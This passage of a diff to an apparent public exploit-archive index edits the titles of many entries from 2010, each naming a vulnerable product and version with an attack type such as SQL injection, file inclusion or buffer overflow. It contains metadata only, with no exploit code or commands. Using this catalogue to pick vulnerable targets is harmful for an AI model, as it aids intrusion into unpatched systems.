",php,webapps,0 11831,platforms/php/webapps/11831.txt,"WebMaid CMS 0.2-6 Beta - Multiple Remote File Inclusion",2010-03-21,"cr4wl3r ",php,webapps,0 @@ -10841,7 +10842,7 @@ id,file,description,date,author,platform,type,port 11851,platforms/php/webapps/11851.txt,"Joomla Component Property - Local File Inclusion",2010-03-23,"Chip d3 bi0s",php,webapps,0 11852,platforms/php/webapps/11852.txt,"Xataface - Admin Authentication Bypass",2010-03-23,Xinapse,php,webapps,0 11853,platforms/php/webapps/11853.txt,"Joomla Component SMEStorage - Local File Inclusion",2010-03-23,"Chip d3 bi0s",php,webapps,0 -11855,platforms/multiple/dos/11855.c,"Jinais IRC Server 0.1.8 - NULL Pointer (PoC)",2010-03-23,"Salvatore Fresta",multiple,dos,0 +11855,platforms/multiple/dos/11855.c,"Jinais IRC Server 0.1.8 - Null Pointer (PoC)",2010-03-23,"Salvatore Fresta",multiple,dos,0 11856,platforms/multiple/remote/11856.txt,"uhttp Server - Directory Traversal",2010-03-23,"Salvatore Fresta",multiple,remote,0 11857,platforms/windows/remote/11857.c,"MX Simulator Server - Remote Buffer Overflow (PoC)",2010-03-23,"Salvatore Fresta",windows,remote,0 11861,platforms/windows/dos/11861.pl,"Smart PC Recorder 4.8 - '.mp3' Local Crash (PoC)",2010-03-24,chap0,windows,dos,0 @@ -10882,7 +10883,7 @@ id,file,description,date,author,platform,type,port 11899,platforms/php/webapps/11899.html,"AdaptCMS_Lite_1.5 2009-07-07 - Exploit",2010-03-27,ITSecTeam,php,webapps,0 11900,platforms/windows/local/11900.pl,"Mini-stream RM-MP3 Converter 3.0.0.7 - '.pls' Universal Stack Buffer Overflow",2010-03-27,mat,windows,local,0 11902,platforms/php/webapps/11902.txt,"MyOWNspace 8.2 - Multi Local File Inclusion",2010-03-27,ITSecTeam,php,webapps,0 -11903,platforms/php/webapps/11903.txt,"Open Web Analytics 1.2.3 - multi file include",2010-03-27,ITSecTeam,php,webapps,0 +11903,platforms/php/webapps/11903.txt,"Open Web Analytics 1.2.3 - multi File Inclusion",2010-03-27,ITSecTeam,php,webapps,0 11904,platforms/php/webapps/11904.txt,"68KB - Multi Remote File Inclusion",2010-03-27,ITSecTeam,php,webapps,0 11905,platforms/php/webapps/11905.txt,"Simple Machines Forum (SMF) 1.1.8 - (avatar) Remote PHP File Execute (PoC)",2010-03-27,JosS,php,webapps,0 11906,platforms/php/webapps/11906.txt,"Uebimiau Webmail 2.7.2 - Multiple Vulnerabilities",2010-03-27,"cp77fk4r ",php,webapps,0 @@ -10926,7 +10927,7 @@ id,file,description,date,author,platform,type,port 11954,platforms/php/webapps/11954.txt,"Wazzum Dating Software - Multiple Vulnerabilities",2010-03-30,EL-KAHINA,php,webapps,0 11955,platforms/windows/dos/11955.py,"All to All Audio Convertor 2.0 - Files Stack Overflow (PoC)",2010-03-30,ITSecTeam,windows,dos,0 11957,platforms/windows/local/11957.py,"Shadow Stream Recorder 3.0.1.7 - '.asx' Local Buffer Overflow",2010-03-30,b0telh0,windows,local,0 -11958,platforms/windows/local/11958.py,"ASX to MP3 Converter 3.0.0.100 - Local Stack Overflow Exploit",2010-03-30,"Hazem mofeed",windows,local,0 +11958,platforms/windows/local/11958.py,"ASX to MP3 Converter 3.0.0.100 - Local Stack Overflow",2010-03-30,"Hazem mofeed",windows,local,0 11959,platforms/windows/dos/11959.pl,"Xilisoft BlackBerry Ring Tone Maker - '.wma' Local Crash",2010-03-30,anonymous,windows,dos,0 11960,platforms/php/webapps/11960.txt,"KimsQ 040109 - Multiple Remote File Inclusion",2010-03-30,mat,php,webapps,0 11962,platforms/php/webapps/11962.txt,"Satellite-X 4.0 - (Authentication Bypass) SQL Injection",2010-03-30,indoushka,php,webapps,0 @@ -10934,7 +10935,7 @@ id,file,description,date,author,platform,type,port 11964,platforms/multiple/webapps/11964.pl,"Easy-Clanpage 2.1 - SQL Injection",2010-03-30,"Easy Laster",multiple,webapps,0 11965,platforms/php/webapps/11965.txt,"kora - Reinstall Admin Information",2010-03-30,indoushka,php,webapps,0 11966,platforms/windows/dos/11966.py,"Easy Icon Maker - '.ico' File Reading Crash",2010-03-30,ITSecTeam,windows,dos,0 -11967,platforms/php/webapps/11967.txt,"Snipe Photo Gallery - Bypass Remote Upload",2010-03-30,indoushka,php,webapps,0 +11967,platforms/php/webapps/11967.txt,"Snipe Photo Gallery - Bypass Arbitrary File Upload",2010-03-30,indoushka,php,webapps,0 11968,platforms/php/webapps/11968.txt,"Hosting-PHP-dynamic - Authentication Bypass",2010-03-30,indoushka,php,webapps,0 11973,platforms/windows/remote/11973.txt,"CompleteFTP Server - Directory Traversal",2010-03-30,zombiefx,windows,remote,0 11974,platforms/windows/remote/11974.py,"HP OpenView NNM - OvWebHelp.exe CGI Topic Overflow",2010-03-30,"S2 Crew",windows,remote,0 @@ -10966,7 +10967,7 @@ id,file,description,date,author,platform,type,port 12003,platforms/php/webapps/12003.txt,"onepound Shop / CMS - Cross-Site Scripting / SQL Injection",2010-04-01,Valentin,php,webapps,0 12004,platforms/php/webapps/12004.txt,"PHP Jokesite 2.0 - exec Command Exploit",2010-04-01,indoushka,php,webapps,0 12005,platforms/php/webapps/12005.txt,"Profi Einzelgebots Auktions System - Blind SQL Injection",2010-04-01,"Easy Laster",php,webapps,0 -12006,platforms/php/webapps/12006.txt,"Simple Calculator by Peter Rekdal Sunde - Remote Upload",2010-04-01,indoushka,php,webapps,0 +12006,platforms/php/webapps/12006.txt,"Simple Calculator by Peter Rekdal Sunde - Arbitrary File Upload",2010-04-01,indoushka,php,webapps,0 12007,platforms/php/webapps/12007.txt,"SimpNews 2.16.2 - Multiple SQL Injections",2010-04-01,NoGe,php,webapps,0 12008,platforms/windows/local/12008.pl,"TugZip 3.5 - '.ZIP' File Buffer Overflow",2010-04-01,Lincoln,windows,local,0 12009,platforms/php/webapps/12009.html,"CMS Made Simple 1.7 - Cross-Site Request Forgery",2010-04-02,"pratul agrawal",php,webapps,0 @@ -10983,23 +10984,23 @@ id,file,description,date,author,platform,type,port 12024,platforms/windows/local/12024.php,"Zip Unzip 6.0 - '.zip' Stack Buffer Overflow (PoC)",2010-04-03,mr_me,windows,local,0 12025,platforms/windows/dos/12025.php,"Dualis 20.4 - '.bin' Local Denial Of Service",2010-04-03,"Yakir Wizman",windows,dos,0 12026,platforms/php/webapps/12026.txt,"phpscripte24 Vor und Rückwärts Auktions System - Blind SQL Injection",2010-04-03,"Easy Laster",php,webapps,0 -12027,platforms/windows/dos/12027.py,"DSEmu 0.4.10 - '.nds' Local Crash Exploit",2010-04-03,l3D,windows,dos,0 +12027,platforms/windows/dos/12027.py,"DSEmu 0.4.10 - '.nds' Local Crash",2010-04-03,l3D,windows,dos,0 12028,platforms/php/webapps/12028.txt,"PHP-fusion dsmsf - (module downloads) SQL Injection",2010-04-03,Inj3ct0r,php,webapps,0 12029,platforms/asp/webapps/12029.txt,"SafeSHOP 1.5.6 - Cross-Site Scripting / Multiple Cross-Site Request Forgery",2010-04-03,"cp77fk4r ",asp,webapps,0 12030,platforms/windows/dos/12030.html,"IncrediMail 2.0 - ActiveX (Authenticate) Buffer Overflow (PoC)",2010-04-03,d3b4g,windows,dos,0 -12031,platforms/php/webapps/12031.html,"Advanced Management For Services Sites - Remote Add Admin Exploit",2010-04-03,alnjm33,php,webapps,0 +12031,platforms/php/webapps/12031.html,"Advanced Management For Services Sites - Remote Add Admin",2010-04-03,alnjm33,php,webapps,0 12032,platforms/windows/dos/12032.html,"Microsoft Internet Explorer Tabular Data Control - ActiveX Remote Code Execution",2010-04-03,ZSploit.com,windows,dos,0 12033,platforms/multiple/remote/12033.txt,"Java Mini Web Server 1.0 - Directory Traversal / Cross-Site Scripting",2010-04-03,"cp77fk4r ",multiple,remote,0 12034,platforms/php/webapps/12034.txt,"Flatpress 0.909.1 - Persistent Cross-Site Scripting",2010-04-03,ITSecTeam,php,webapps,0 -12035,platforms/windows/local/12035.pl,"ZipScan 2.2c - SEH",2010-04-03,"Lincoln and corelanc0d3r",windows,local,0 -12036,platforms/hardware/webapps/12036.txt,"Edimax AR-7084GA Router - Cross-Site Request Forgery / Persistent Cross-Site Scripting Exploit",2010-04-03,l3D,hardware,webapps,0 +12035,platforms/windows/local/12035.pl,"ZipScan 2.2c - SEH Exploit",2010-04-03,"Lincoln and corelanc0d3r",windows,local,0 +12036,platforms/hardware/webapps/12036.txt,"Edimax AR-7084GA Router - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2010-04-03,l3D,hardware,webapps,0 12037,platforms/php/webapps/12037.txt,"Joomla Component jp_jobs - SQL Injection",2010-04-03,Valentin,php,webapps,0 12038,platforms/php/webapps/12038.txt,"Advanced Management For Services Sites - Bypass Create And Download SQL Backup",2010-04-04,indoushka,php,webapps,0 12039,platforms/multiple/webapps/12039.txt,"QuickEStore 6.1 - Backup Dump",2010-04-04,indoushka,multiple,webapps,0 12041,platforms/php/webapps/12041.txt,"Solutive CMS - SQL Injection",2010-04-04,"Th3 RDX",php,webapps,0 12042,platforms/php/webapps/12042.txt,"x10 mirco blogging 121 - SQL Injection",2010-04-04,ITSecTeam,php,webapps,0 12043,platforms/php/webapps/12043.html,"Prediction League 0.3.8 - Cross-Site Request Forgery (Create Admin User) Exploit",2010-04-04,indoushka,php,webapps,0 -12044,platforms/windows/remote/12044.c,"Easy Ftp Server 1.7.0.2 - MKD Remote Post-Authentication Buffer Overflow Exploit",2010-04-04,x90c,windows,remote,0 +12044,platforms/windows/remote/12044.c,"Easy Ftp Server 1.7.0.2 - MKD Remote Post-Authentication Buffer Overflow",2010-04-04,x90c,windows,remote,0 12045,platforms/php/webapps/12045.html,"MunkyScripts Simple Gallery - SQL Injection",2010-04-04,ITSecTeam,php,webapps,0 12047,platforms/php/webapps/12047.html,"nodesforum 1.033 - Remote File Inclusion",2010-04-04,ITSecTeam,php,webapps,0 12048,platforms/php/webapps/12048.html,"ttCMS 5.0 - Remote File Inclusion",2010-04-04,ITSecTeam,php,webapps,0 @@ -11013,7 +11014,7 @@ id,file,description,date,author,platform,type,port 12056,platforms/php/webapps/12056.txt,"Joomla Component WISro Yahoo Quotes - Local File Inclusion",2010-04-04,NoGe,php,webapps,0 12057,platforms/php/webapps/12057.txt,"Joomla Component com_press - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0 12058,platforms/php/webapps/12058.txt,"Joomla Component Picasa 2.0 - Local File Inclusion",2010-04-04,Vrs-hCk,php,webapps,0 -12059,platforms/windows/local/12059.pl,"eZip Wizard 3.0 - '.zip' SEH",2010-04-04,"Lincoln and corelanc0d3r",windows,local,0 +12059,platforms/windows/local/12059.pl,"eZip Wizard 3.0 - '.zip' SEH Exploit",2010-04-04,"Lincoln and corelanc0d3r",windows,local,0 12060,platforms/php/webapps/12060.txt,"Joomla Component com_serie - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0 12061,platforms/php/webapps/12061.txt,"Facil-CMS - (Local File Inclusion / Remote File Inclusion)",2010-04-04,eidelweiss,php,webapps,0 12062,platforms/php/webapps/12062.txt,"Joomla Component com_ranking - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0 @@ -11056,7 +11057,7 @@ id,file,description,date,author,platform,type,port 12102,platforms/php/webapps/12102.txt,"Joomla Component VJDEO com_vjdeo 1.0 - Local File Inclusion",2010-04-07,"Angela Zhang",php,webapps,0 12103,platforms/multiple/local/12103.txt,"Local Glibc shared library (.so) 2.11.1 - Exploit",2010-04-07,Rh0,multiple,local,0 12104,platforms/windows/dos/12104.py,"Anyzip 1.1 - '.zip' PoC (SEH)",2010-04-07,ITSecTeam,windows,dos,0 -12105,platforms/php/webapps/12105.txt,"Free Image & File Hosting - Upload",2010-04-07,indoushka,php,webapps,0 +12105,platforms/php/webapps/12105.txt,"Free Image & File Hosting - Arbitrary File Upload",2010-04-07,indoushka,php,webapps,0 12106,platforms/php/webapps/12106.txt,"Istgah for Centerhost - Multiple Vulnerabilities",2010-04-07,indoushka,php,webapps,0 12107,platforms/php/webapps/12107.txt,"Plume CMS 1.2.4 - Multiple Local File Inclusion",2010-04-07,eidelweiss,php,webapps,0 12108,platforms/php/webapps/12108.txt,"Joomla Component com_articles - SQL Injection",2010-04-08,"pratul agrawal",php,webapps,0 @@ -11064,7 +11065,7 @@ id,file,description,date,author,platform,type,port 12110,platforms/windows/dos/12110.pl,"CompleteFTP 3.3.0 - Remote Memory Consumption Denial of Service",2010-04-08,"Jonathan Salwan",windows,dos,0 12111,platforms/php/webapps/12111.txt,"Joomla Component Webee Comments - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0 12112,platforms/php/webapps/12112.txt,"Joomla Component Realtyna Translator - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0 -12113,platforms/php/webapps/12113.txt,"Joomla Component AWDwall-Joomla - (cbuser) Local File Inclusion / SQL Injection",2010-04-08,AntiSecurity,php,webapps,0 +12113,platforms/php/webapps/12113.txt,"Joomla Component AWDwall-Joomla - (cbuser) Local File Inclusion / SQL Injection",2010-04-08,AntiSecurity,php,webapps,0 12114,platforms/multiple/remote/12114.txt,"miniature java Web server 1.71 - Multiple Vulnerabilities",2010-04-08,"cp77fk4r ",multiple,remote,0 12115,platforms/php/webapps/12115.txt,"Kubeit CMS - SQL Injection",2010-04-08,Phenom,php,webapps,0 12117,platforms/windows/remote/12117.txt,"Java Deployment Toolkit - Performs Insufficient Validation of Parameters",2010-04-09,"Tavis Ormandy",windows,remote,0 @@ -11075,7 +11076,7 @@ id,file,description,date,author,platform,type,port 12122,platforms/multiple/remote/12122.txt,"JAVA Web Start - Arbitrary Command-Line Injection",2010-04-09,"Ruben Santamarta ",multiple,remote,0 12123,platforms/php/webapps/12123.txt,"Joomla Component com_pcchess - Local File Inclusion",2010-04-09,team_elite,php,webapps,0 12124,platforms/php/webapps/12124.txt,"Joomla Component huruhelpdesk - SQL Injection",2010-04-09,bumble_be,php,webapps,0 -12128,platforms/php/webapps/12128.txt,"GarageSales - Remote Upload",2010-04-09,saidinh0,php,webapps,0 +12128,platforms/php/webapps/12128.txt,"GarageSales - Arbitrary File Upload",2010-04-09,saidinh0,php,webapps,0 12130,platforms/linux/local/12130.py,"(Linux Kernel 2.6.34-rc3) ReiserFS (Redhat / Ubuntu 9.10) - xattr Privilege Escalation",2010-04-09,"Jon Oberheide",linux,local,0 12131,platforms/windows/dos/12131.py,"Tembria Server Monitor 5.6.0 - Denial of Service",2010-04-09,Lincoln,windows,dos,0 12132,platforms/php/webapps/12132.pl,"joomla Component com_agenda 1.0.1 - 'id' SQL Injection",2010-04-09,v3n0m,php,webapps,0 @@ -11098,11 +11099,11 @@ id,file,description,date,author,platform,type,port 12149,platforms/php/webapps/12149.txt,"Joomla Component spsNewsletter - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 12150,platforms/php/webapps/12150.txt,"Joomla Component AlphaUserPoints - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 12151,platforms/php/webapps/12151.txt,"Joomla Component TRAVELbook - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 -12152,platforms/windows/remote/12152.pl,"Trellian FTP Client - PASV Buffer Overflow Exploit",2010-04-11,zombiefx,windows,remote,0 +12152,platforms/windows/remote/12152.pl,"Trellian FTP Client - PASV Buffer Overflow",2010-04-11,zombiefx,windows,remote,0 12153,platforms/php/webapps/12153.txt,"joomla Component education - SQL Injection",2010-04-11,bumble_be,php,webapps,0 12154,platforms/php/dos/12154.txt,"vBulletin 'Cyb - Advanced Forum Statistics' Denial of Service",2010-04-10,"Andhra Hackers",php,dos,0 12155,platforms/php/webapps/12155.txt,"AuroraGPT 4.0 - Remote Code Execution",2010-04-11,"Amoo Arash",php,webapps,0 -12156,platforms/windows/remote/12156.txt,"Microsoft Internet Explorer/Opera - source code viewer Null Character Handling",2010-04-11,"Daniel Correa",windows,remote,0 +12156,platforms/windows/remote/12156.txt,"Microsoft Internet Explorer/Opera - Source Code viewer Null Character Handling",2010-04-11,"Daniel Correa",windows,remote,0 12157,platforms/php/webapps/12157.txt,"OnePC mySite Management Software - SQL Injection",2010-04-11,Valentin,php,webapps,0 12158,platforms/php/webapps/12158.py,"Elite Gaming Ladders 3.5 - (match) SQL Injection",2010-04-11,"Easy Laster",php,webapps,0 12159,platforms/php/webapps/12159.txt,"Joomla Component Multi-Venue Restaurant Menu Manager - SQL Injection",2010-04-11,Valentin,php,webapps,0 @@ -11132,14 +11133,14 @@ id,file,description,date,author,platform,type,port 12183,platforms/php/webapps/12183.txt,"Joomla Component com_jdrugstopics - SQL Injection",2010-04-12,SadHaCkEr,php,webapps,0 12184,platforms/php/webapps/12184.txt,"Joomla Component com_sermonspeaker - SQL Injection",2010-04-12,SadHaCkEr,php,webapps,0 12185,platforms/php/webapps/12185.txt,"Joomla Component com_flexicontent - Local File",2010-04-12,eidelweiss,php,webapps,0 -12187,platforms/php/webapps/12187.txt,"Vieassociative Openmairie 1.01 Beta - (Remote File Inclusion / Local File Inclusion) Multiple File Include",2010-04-12,"cr4wl3r ",php,webapps,0 +12187,platforms/php/webapps/12187.txt,"Vieassociative Openmairie 1.01 Beta - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-12,"cr4wl3r ",php,webapps,0 12188,platforms/multiple/dos/12188.txt,"VMware Remote Console e.x.p build-158248 - Format String",2010-04-12,"Alexey Sintsov",multiple,dos,0 12189,platforms/windows/local/12189.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,windows,local,0 12190,platforms/php/webapps/12190.txt,"Joomla Component Jvehicles - (aid) SQL Injection",2010-04-13,"Don Tukulesto",php,webapps,0 12191,platforms/php/webapps/12191.txt,"joomla Component com_jp_jobs 1.2.0 - 'id' SQL Injection",2010-04-13,v3n0m,php,webapps,0 12192,platforms/php/webapps/12192.txt,"blog system 1.5 - Multiple Vulnerabilities",2010-04-13,"cp77fk4r ",php,webapps,0 -12193,platforms/php/webapps/12193.txt,"Openurgence vaccin 1.03 - (Remote File Inclusion / Local File Inclusion) Multiple File Include",2010-04-13,"cr4wl3r ",php,webapps,0 -12194,platforms/php/webapps/12194.txt,"Police Municipale Open Main Courante 1.01beta - (Remote File Inclusion / Local File Inclusion) Multiple File Include",2010-04-13,"cr4wl3r ",php,webapps,0 +12193,platforms/php/webapps/12193.txt,"Openurgence vaccin 1.03 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-13,"cr4wl3r ",php,webapps,0 +12194,platforms/php/webapps/12194.txt,"Police Municipale Open Main Courante 1.01beta - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-13,"cr4wl3r ",php,webapps,0 12195,platforms/php/webapps/12195.rb,"joelz bulletin board 0.9.9rc3 - Multiple SQL Injections",2010-04-13,"Easy Laster",php,webapps,0 12197,platforms/asp/webapps/12197.txt,"Mp3 MuZik - DataBase Download",2010-04-13,indoushka,asp,webapps,0 12198,platforms/php/webapps/12198.txt,"Games Script - (Galore) Backup Dump",2010-04-13,indoushka,php,webapps,0 @@ -11150,9 +11151,9 @@ id,file,description,date,author,platform,type,port 12203,platforms/windows/remote/12203.html,"MagnetoSoft SNTP 4.0.0.7 - ActiveX SntpGetReply Buffer Overflow",2010-04-13,s4squatch,windows,remote,0 12204,platforms/windows/dos/12204.html,"MagnetoSoft SNTP 4.0.0.7 - ActiveX SntpSendRequest Crash (PoC)",2010-04-13,s4squatch,windows,dos,0 12205,platforms/windows/dos/12205.html,"MagnetoSoft NetworkResources 4.0.0.5 - ActiveX NetSessionDel (PoC)",2010-04-13,s4squatch,windows,dos,0 -12206,platforms/windows/dos/12206.html,"MagnetoSoft NetworkResources 4.0.0.5 - ActiveX NetFileClose SEH Overwrite (PoC)",2010-04-13,s4squatch,windows,dos,0 -12207,platforms/windows/dos/12207.html,"MagnetoSoft NetworkResources 4.0.0.5 - ActiveX NetShareEnum SEH Overwrite (PoC)",2010-04-13,s4squatch,windows,dos,0 -12208,platforms/windows/dos/12208.html,"MagnetoSoft NetworkResources - ActiveX NetConnectionEnum SEH Overwrite (PoC)",2010-04-13,s4squatch,windows,dos,0 +12206,platforms/windows/dos/12206.html,"MagnetoSoft NetworkResources 4.0.0.5 - ActiveX NetFileClose Overwrite (SEH) (PoC)",2010-04-13,s4squatch,windows,dos,0 +12207,platforms/windows/dos/12207.html,"MagnetoSoft NetworkResources 4.0.0.5 - ActiveX NetShareEnum Overwrite (SEH) (PoC)",2010-04-13,s4squatch,windows,dos,0 +12208,platforms/windows/dos/12208.html,"MagnetoSoft NetworkResources - ActiveX NetConnectionEnum Overwrite (SEH) (PoC)",2010-04-13,s4squatch,windows,dos,0 12212,platforms/php/webapps/12212.txt,"Opentel Openmairie tel 1.02 - Local File Inclusion",2010-04-14,"cr4wl3r ",php,webapps,0 12213,platforms/windows/local/12213.c,"Micropoint ProActive Denfense Mp110013.sys 1.3.10123.0 - Privilege Escalation",2010-04-14,MJ0011,windows,local,0 12217,platforms/multiple/dos/12217.py,"Aircrack-NG Tools svn r1675 - Remote Exploit",2010-04-14,"Lukas Lueg",multiple,dos,0 @@ -11161,9 +11162,9 @@ id,file,description,date,author,platform,type,port 12220,platforms/php/webapps/12220.txt,"Almnzm 2.1 - SQL Injection",2010-04-14,"NeX HaCkEr",php,webapps,0 12221,platforms/php/webapps/12221.rb,"Bild Flirt 1.0 - SQL Injection",2010-04-14,"Easy Laster",php,webapps,0 12222,platforms/php/webapps/12222.txt,"PhpMesFilms 1.8 - SQL Injection",2010-04-14,indoushka,php,webapps,0 -12223,platforms/php/webapps/12223.txt,"Multi-Mirror - Remote Upload",2010-04-14,indoushka,php,webapps,0 -12224,platforms/php/webapps/12224.txt,"Mihalism Multi Host 4.0.0 - Upload",2010-04-14,indoushka,php,webapps,0 -12226,platforms/php/webapps/12226.txt,"Magic Uploader Mini - Upload",2010-04-14,indoushka,php,webapps,0 +12223,platforms/php/webapps/12223.txt,"Multi-Mirror - Arbitrary File Upload",2010-04-14,indoushka,php,webapps,0 +12224,platforms/php/webapps/12224.txt,"Mihalism Multi Host 4.0.0 - Arbitrary File Upload",2010-04-14,indoushka,php,webapps,0 +12226,platforms/php/webapps/12226.txt,"Magic Uploader Mini - Arbitrary File Upload",2010-04-14,indoushka,php,webapps,0 12227,platforms/php/webapps/12227.txt,"YUI Images Script - Arbitrary File Upload",2010-04-14,Mr.P3rfekT,php,webapps,0 12228,platforms/windows/dos/12228.py,"MovieLibrary 1.4.401 - Local Denial of Service (.dmv)",2010-04-14,anonymous,windows,dos,0 12229,platforms/windows/dos/12229.py,"Book Library 1.4.162 - Local Denial of Service (.bkd)",2010-04-14,anonymous,windows,dos,0 @@ -11190,7 +11191,7 @@ id,file,description,date,author,platform,type,port 12248,platforms/windows/remote/12248.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetConnectionEnum Exploit (Universal)",2010-04-15,dookie,windows,remote,0 12249,platforms/php/webapps/12249.txt,"60cycleCMS 2.5.2 - (DOCUMENT_ROOT) Multiple Local File Inclusion",2010-04-15,eidelweiss,php,webapps,0 12250,platforms/windows/remote/12250.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetShareEnum Exploit (Universal)",2010-04-15,dookie,windows,remote,0 -12251,platforms/php/webapps/12251.php,"Camiro-CMS_beta-0.1 - 'FCKeditor' Arbitrary File Upload Exploit",2010-04-15,eidelweiss,php,webapps,0 +12251,platforms/php/webapps/12251.php,"Camiro-CMS_beta-0.1 - 'FCKeditor' Arbitrary File Upload",2010-04-15,eidelweiss,php,webapps,0 12252,platforms/hardware/dos/12252.txt,"IBM Bladecenter Management Module - Denial of Service",2010-04-15,"Alexey Sintsov",hardware,dos,0 12254,platforms/php/webapps/12254.txt,"FCKEditor Core - (FileManager test.html) Arbitrary File Upload (1)",2010-04-16,Mr.MLL,php,webapps,0 12255,platforms/windows/local/12255.rb,"Winamp 5.572 - whatsnew.txt SEH (Metasploit)",2010-04-16,blake,windows,local,0 @@ -11204,7 +11205,7 @@ id,file,description,date,author,platform,type,port 12263,platforms/multiple/remote/12263.txt,"Apache OFBiz - SQL Remote Execution PoC Payload",2010-04-16,"Lucas Apa",multiple,remote,0 12264,platforms/multiple/remote/12264.txt,"Apache OFBiz - FULLADMIN Creator PoC Payload",2010-04-16,"Lucas Apa",multiple,remote,0 12265,platforms/hardware/remote/12265.txt,"Iomega Home Media Network Hard Drive 2.038 < 2.061 - Unauthenticated File-system Access",2010-04-16,fizix610,hardware,remote,0 -12266,platforms/php/webapps/12266.txt,"60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change Username and Password Exploit)",2010-04-16,EL-KAHINA,php,webapps,0 +12266,platforms/php/webapps/12266.txt,"60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change 'Username' and Password Exploit)",2010-04-16,EL-KAHINA,php,webapps,0 12267,platforms/php/webapps/12267.txt,"WebAdmin - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps,0 12268,platforms/php/webapps/12268.txt,"Uploader 0.7 - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps,0 12269,platforms/php/webapps/12269.txt,"Joomla Component com_joltcard - SQL Injection",2010-04-16,Valentin,php,webapps,0 @@ -11213,7 +11214,7 @@ id,file,description,date,author,platform,type,port 12273,platforms/windows/dos/12273.py,"Microsoft Windows 7/2008R2 - SMB Client Trans2 Stack Overflow 10-020 (PoC)",2010-04-17,"laurent gaffie",windows,dos,0 12274,platforms/windows/dos/12274.py,"Multiple Vendor AgentX++ - Stack Buffer Overflow",2010-04-17,ZSploit.com,windows,dos,0 12276,platforms/php/webapps/12276.txt,"redaxo CMS 4.2.1 - Remote File Inclusion",2010-04-18,eidelweiss,php,webapps,0 -12277,platforms/php/webapps/12277.txt,"Openscrutin 1.03 - (Remote File Inclusion / Local File Inclusion) Multiple File Include",2010-04-18,"cr4wl3r ",php,webapps,0 +12277,platforms/php/webapps/12277.txt,"Openscrutin 1.03 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-18,"cr4wl3r ",php,webapps,0 12278,platforms/php/webapps/12278.txt,"Alegro 1.2.1 - SQL Injection",2010-04-18,indoushka,php,webapps,0 12279,platforms/php/webapps/12279.txt,"eclime 1.1 - Bypass / Create and Download Backup",2010-04-18,indoushka,php,webapps,0 12280,platforms/php/webapps/12280.txt,"dl_stats - Multiple Vulnerabilities",2010-04-18,"Valentin Hoebel",php,webapps,0 @@ -11231,7 +11232,7 @@ id,file,description,date,author,platform,type,port 12293,platforms/windows/local/12293.py,"TweakFS 1.0 - (FSX Edition) Stack Buffer Overflow",2010-04-19,corelanc0d3r,windows,local,0 12294,platforms/windows/dos/12294.txt,"avtech software (avc781viewer.dll) ActiveX - Multiple Vulnerabilities",2010-04-19,LiquidWorm,windows,dos,0 12295,platforms/php/webapps/12295.txt,"N/X Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities",2010-04-19,eidelweiss,php,webapps,0 -12296,platforms/php/webapps/12296.txt,"Openreglement 1.04 - (Remote File Inclusion / Local File Inclusion) Multiple File Include",2010-04-19,"cr4wl3r ",php,webapps,0 +12296,platforms/php/webapps/12296.txt,"Openreglement 1.04 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-19,"cr4wl3r ",php,webapps,0 12297,platforms/hardware/dos/12297.txt,"Huawei EchoLife HG520c - Denial of Service / Modem Reset",2010-04-19,hkm,hardware,dos,0 12298,platforms/hardware/remote/12298.txt,"Huawei EchoLife HG520 - Remote Information Disclosure",2010-04-19,hkm,hardware,remote,0 12299,platforms/php/webapps/12299.txt,"Joomla Component GBU FACEBOOK 1.0.5 - SQL Injection",2010-04-19,kaMtiEz,php,webapps,0 @@ -11242,10 +11243,10 @@ id,file,description,date,author,platform,type,port 12305,platforms/php/webapps/12305.txt,"Joomla com_jnewspaper - 'cid' SQL Injection",2010-04-20,"Don Tukulesto",php,webapps,0 12306,platforms/php/webapps/12306.txt,"Joomla Component JTM Reseller 1.9 Beta - SQL Injection",2010-04-20,kaMtiEz,php,webapps,0 12308,platforms/windows/remote/12308.txt,"Multi-Threaded HTTP Server 1.1 - Source Disclosure",2010-04-20,Dr_IDE,windows,remote,0 -12309,platforms/windows/remote/12309.txt,"Mongoose Web Server 2.8 - Multiple Directory Traversal Exploits",2010-04-20,Dr_IDE,windows,remote,0 -12310,platforms/windows/remote/12310.txt,"Acritum Femitter 1.03 - Directory Traversal Exploit",2010-04-20,Dr_IDE,windows,remote,0 +12309,platforms/windows/remote/12309.txt,"Mongoose Web Server 2.8 - Multiple Directory Traversals",2010-04-20,Dr_IDE,windows,remote,0 +12310,platforms/windows/remote/12310.txt,"Acritum Femitter 1.03 - Directory Traversal",2010-04-20,Dr_IDE,windows,remote,0 12312,platforms/windows/remote/12312.rb,"EasyFTP Server 1.7.0.2 - CWD Buffer Overflow (Metasploit)",2010-04-20,"Paul Makowski",windows,remote,0 -12313,platforms/php/webapps/12313.txt,"Openregistrecil 1.02 - (Remote File Inclusion / Local File Inclusion) Multiple File Include",2010-04-20,"cr4wl3r ",php,webapps,0 +12313,platforms/php/webapps/12313.txt,"Openregistrecil 1.02 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-20,"cr4wl3r ",php,webapps,0 12314,platforms/windows/dos/12314.py,"Speed Commander 13.10 - '.zip' Memory Corruption",2010-04-20,TecR0c,windows,dos,0 12315,platforms/php/webapps/12315.txt,"v2marketplacescript Upload_images Script (-7777) - Arbitrary File Upload",2010-04-21,cyberlog,php,webapps,0 12316,platforms/php/webapps/12316.txt,"Joomla Component wmi (com_wmi) - Local File Inclusion",2010-04-21,"wishnusakti + 